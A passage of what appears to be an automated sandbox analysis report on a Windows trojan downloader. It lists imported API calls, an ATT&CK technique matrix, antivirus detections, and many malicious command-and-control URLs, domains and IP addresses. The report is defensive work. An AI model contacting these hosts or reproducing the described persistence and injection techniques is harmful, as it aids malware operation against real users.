ime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpenKeyExA,RegOpenKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,RegCreate3_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpenKeyExA,RegOpenKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,RegCreate3_2_00403A19
Source: winlogon.exe, 00000004.00000002.3819098837.000002A6743E0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000004.00000000.1356063357.000002A6743E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1357959345.0000000001311000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
Source: winlogon.exe, 00000004.00000002.3819098837.000002A6743E0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000004.00000000.1356063357.000002A6743E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000003.2213841197.0000000008C36000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000004.00000002.3819098837.000002A6743E0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000004.00000000.1356063357.000002A6743E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1357959345.0000000001311000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: winlogon.exe, 00000004.00000002.3819098837.000002A6743E0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000004.00000000.1356063357.000002A6743E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1357959345.0000000001311000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000002.3817558651.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1357798276.0000000000DA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanDI3
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_0040355D lstrcpyA,gethostbyname,htons,socket,closesocket,GetIpAddrTable,GetIpAddrTable,wsprintfA,lstrlenA,RasEnumConnectionsA,lstrcmpiA,lstrcmpiA,CreateThread,CloseHandle,GetSystemTimeAsFileTime,RegSetValueExA,RegSetValueExA,Sleep,0_2_0040355D
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat0_2_00403A19

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
Registry Run Keys / Startup Folder		312
Process Injection		121
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
Registry Run Keys / Startup Folder		21
Virtualization/Sandbox Evasion		LSASS Memory121
Security Software Discovery		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		312
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS13
Process Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials3
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
5SGOAKv7AR.exe89%VirustotalBrowse
5SGOAKv7AR.exe84%ReversingLabsWin32.Trojan.ExplorerHijack
5SGOAKv7AR.exe100%AviraTR/Downloader.Gen
5SGOAKv7AR.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows\SysWOW64\ehmehut.dll100%AviraTR/Dldr.Agent.swim
C:\Users\user\AppData\Roaming\tmp5C6F.tmp100%AviraTR/Downloader.Gen
C:\Windows\SysWOW64\edsuvoov-usum.exe100%AviraTR/Downloader.Gen
C:\Windows\SysWOW64\edsuvoov-usum.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\osgobah.dll42%ReversingLabsWin32.Trojan.Generic
C:\Windows\SysWOW64\edsuvoov-usum.exe84%ReversingLabsWin32.Trojan.ExplorerHijack
C:\Windows\SysWOW64\ehmehut.dll34%ReversingLabsWin32.Trojan.Wacatac

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
vnsudgrujuqaw.vg0%VirustotalBrowse
taiqjio.ws0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://utbidet-ugeas.biz/d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869F100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?025085CC3A5785CC3A6285E43A508542E9C4BD646051850C925286FA1462ABF50860B5E23A100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?0259BA88095EBA88096BBAA00959BA06DACD82205358BA48A15BB9BE276B94B13B698AA609100%Avira URL Cloudphishing
http://pwoawmujdqwzs.mp/0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02A8ABCE52AFABCE529AABE652A8AB40813C936608A9AB0EFAAAA8F87C9A85F760989BE052100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?022257A5E92557A5E910578DE922572B3AB66F0DB323576541205493C710799CDB12678100%Avira URL Cloudphishing
http://ovonq.tk/0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC43100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC435D1100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411C100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A100%Avira URL Cloudphishing
http://ylmed.cm/0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51531100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AFB92100%Avira URL Cloudphishing
http://cgengcwnm.kr/Uy0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1D100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?027812AD6B7F12AD6B4A12856B781223B8EC2A053179126DC37A119B454A3C94594822836B100%Avira URL Cloudphishing
http://oukpcbtqgqwoa.nu/mL0%Avira URL Cloudsafe
http://sgfpiiwog.tk/;00%Avira URL Cloudsafe
http://ww99.utbidet-ugeas.biz/d/N?028C86100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C1100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFA100%Avira URL Cloudphishing
http://oukpcbtqgqwoa.nu/~0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53DA7100%Avira URL Cloudphishing
http://ww99.utbidet-ugeas.biz/d/N?0263D5344564D5344551D51C4563D5BA96F7ED9C1F62D5F4ED61D6026B51FB0D77100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E6100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?0235A3ED6032A3ED6007A3C56035A363B3A19B453A34A32DC837A0DB4E078DD4520593C100%Avira URL Cloudphishing
http://%s.biz/d/N?http://%s.biz/d/G?http://%s/d/rpt?%smodemisdn%u.%u.%u.%s0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F8649019100%Avira URL Cloudphishing
https://android.notify.windows.com/iOSd0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?021685246B1185246B24850C6B1685AAB882BD8C311785E4C31486124524AB1D5926B50A6B100%Avira URL Cloudphishing
http://qdukhasgmus.tk/0%Avira URL Cloudsafe
http://owzuhlkauoavrg.rw/p0%Avira URL Cloudsafe
http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
http://pdrwqa.mp/:0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02E9217EECEE217EECDB2156ECE921F03F7D19D6B6E821BE44EB2248C2DB0F47DED91150EC100%Avira URL Cloudphishing
http://%s.biz/d/N?0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02B2F2472FB5F2472F80F26F2FB2F2C9FC26CAEF75B3F28787B0F1710180DC7E1D82C2692F100%Avira URL Cloudphishing
http://ns.adobe0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7100%Avira URL Cloudphishing
http://ww99.utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F100%Avira URL Cloudphishing
http://jwimhacdt.cm/0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AF100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02A8EA4905AFEA49059AEA6105A8EAC7D63CD2E15FA9EA89ADAAE97F2B9AC4703798DA6100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411C821100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?0244C4EA6D43C4EA6D76C4C26D44C464BED0FC423745C42AC546C7DC4376EAD35F74F4C46D100%Avira URL Cloudphishing
http://wfnsamu.st/L100%Avira URL Cloudmalware
http://utbidet-ugeas.biz/d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3100%Avira URL Cloudphishing
http://quzgmnyiqyqoez.kr/0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?027124AD727624AD7243248572712423A1E51C052870246DDA73279B5C430A944041148100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02607BE3D5677BE3D5527BCBD5607B6D06F4434B8F617B237D6278D5FB5255DAE7504BCDD5100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F100%Avira URL Cloudphishing
http://uvwabzkyifixf.tk/0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65100%Avira URL Cloudphishing
https://api.msn.com/%0%Avira URL Cloudsafe
http://quzgmnyiqyqoez.kr0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A100%Avira URL Cloudphishing
https://excel.office.comj0%Avira URL Cloudsafe
http://sgfpiiwog.tk/xy0%Avira URL Cloudsafe
http://pdrwqa.mp/z0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?025C90F0795C90F0796E90DC795C907EAAC8A858235D9030D15E93C6576EBEC94B6CA0DE79100%Avira URL Cloudphishing
http://ww99.utbidet-ugeas.biz/d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FB100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1D5A1100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53100%Avira URL Cloudphishing
http://ww99.utbidet-ugeas.biz/d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E16554100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?023449DD0C3349DD0C0649B50C344953DFA071755635491DA4364AEB220667E43E0479F100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F100%Avira URL Cloudphishing
http://akpzumsigtkmmw.mp/0%Avira URL Cloudsafe
http://schemas.micro0%Avira URL Cloudsafe
https://wns.windows.com/ilable10%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?0238A005623FA005620AA02D6238A08BB1AC98AD3839A0C5CA3AA3334C0A8E3C5008902B62100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7379100%Avira URL Cloudphishing
http://ylmed.cm/xzK0L~0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887100%Avira URL Cloudphishing
http://ww99.utbidet-ugeas.biz/d/N?0216856100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?0249C8E2654EC8E2657BC8CA6549C86CB6DDF04A3F48C822CD4BCBD44B7BE6DB5779F8C100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02807A0D42877A0D42B27A2542807A83911442A518817ACDEA82793B6CB2543470B04A2342100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02263F721B213F721B143F5A1B263FFCC8B207DA41273FB2B3243C443514114B29160F5C1B100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF100%Avira URL Cloudphishing
http://owzuhlkauoavrg.rw/(0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553E25100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?025D7412245A7412246F743A245D749CF7C94CBA7E5C74D28C5F77240A6F5A2B166D443C24100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFAEDD100%Avira URL Cloudphishing
http://ww99.utbidet-ugeas.biz/d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AF100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F86490198B4100%Avira URL Cloudphishing

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
vnsudgrujuqaw.vg
88.198.29.97
truefalseunknown
taiqjio.ws
64.70.19.203
truefalseunknown
wegkycraooigi.ws
64.70.19.203
truefalse
    		unknown
    esqkgcss.ph
    		45.79.222.138
    		truefalse
      		unknown
      uvomuyoigeqh.ws
      		64.70.19.203
      		truefalse
        		unknown
        atewnko.ph
        		45.79.222.138
        		truefalse
          		unknown
          gnwseqckkmly.ph
          		45.79.222.138
          		truefalse
            		unknown
            ysbgwpqywiujo.ph
            		45.79.222.138
            		truetrue
              		unknown
              neupqnkgba.ws
              		64.70.19.203
              		truefalse
                		unknown
                epjgqyk.vg
                		88.198.29.97
                		truefalse
                  		unknown
                  btmcgia.ws
                  		64.70.19.203
                  		truefalse
                    		unknown
                    haofpecu.vg
                    		88.198.29.97
                    		truefalse
                      		unknown
                      jkknameib.vg
                      		88.198.29.97
                      		truefalse
                        		unknown
                        ndqcy.ws
                        		64.70.19.203
                        		truefalse
                          		unknown
                          cywkjn.vg
                          		88.198.29.97
                          		truefalse
                            		unknown
                            pqqembk.vg
                            		88.198.29.97
                            		truefalse
                              		unknown
                              pmoodvkmiigul.vg
                              		88.198.29.97
                              		truefalse
                                		unknown
                                gurlwrqpctlkiu.ws
                                		64.70.19.203
                                		truefalse
                                  		unknown
                                  ypnuaffmx.vg
                                  		88.198.29.97
                                  		truefalse
                                    		unknown
                                    goqcygcoo.ph
                                    		45.79.222.138
                                    		truefalse
                                      		unknown
                                      biguscy.ws
                                      		64.70.19.203
                                      		truefalse
                                        		unknown
                                        lfcwiw.ph
                                        		45.79.222.138
                                        		truefalse
                                          		unknown
                                          geocssarlwqkae.ws
                                          		64.70.19.203
                                          		truefalse
                                            		unknown
                                            fyumrag.vg
                                            		88.198.29.97
                                            		truefalse
                                              		unknown
                                              utbidet-ugeas.biz
                                              		172.234.222.138
                                              		truefalse
                                                		unknown
                                                muizcaelkbpus.ws
                                                		64.70.19.203
                                                		truefalse
                                                  		unknown
                                                  olmoutsceagaml.ph
                                                  		45.79.222.138
                                                  		truefalse
                                                    		unknown
                                                    qatewn.vg
                                                    		88.198.29.97
                                                    		truefalse
                                                      		unknown
                                                      vrkofomkuzuymp.ph
                                                      		45.79.222.138
                                                      		truefalse
                                                        		unknown
                                                        msqnej.ws
                                                        		64.70.19.203
                                                        		truefalse
                                                          		unknown
                                                          mxeye.ph
                                                          		45.79.222.138
                                                          		truefalse
                                                            		unknown
                                                            ivoskdmxlinnf.ws
                                                            		64.70.19.203
                                                            		truefalse
                                                              		unknown
                                                              csyqosocetow.vg
                                                              		88.198.29.97
                                                              		truefalse
                                                                		unknown
                                                                lconagoqitcc.ws
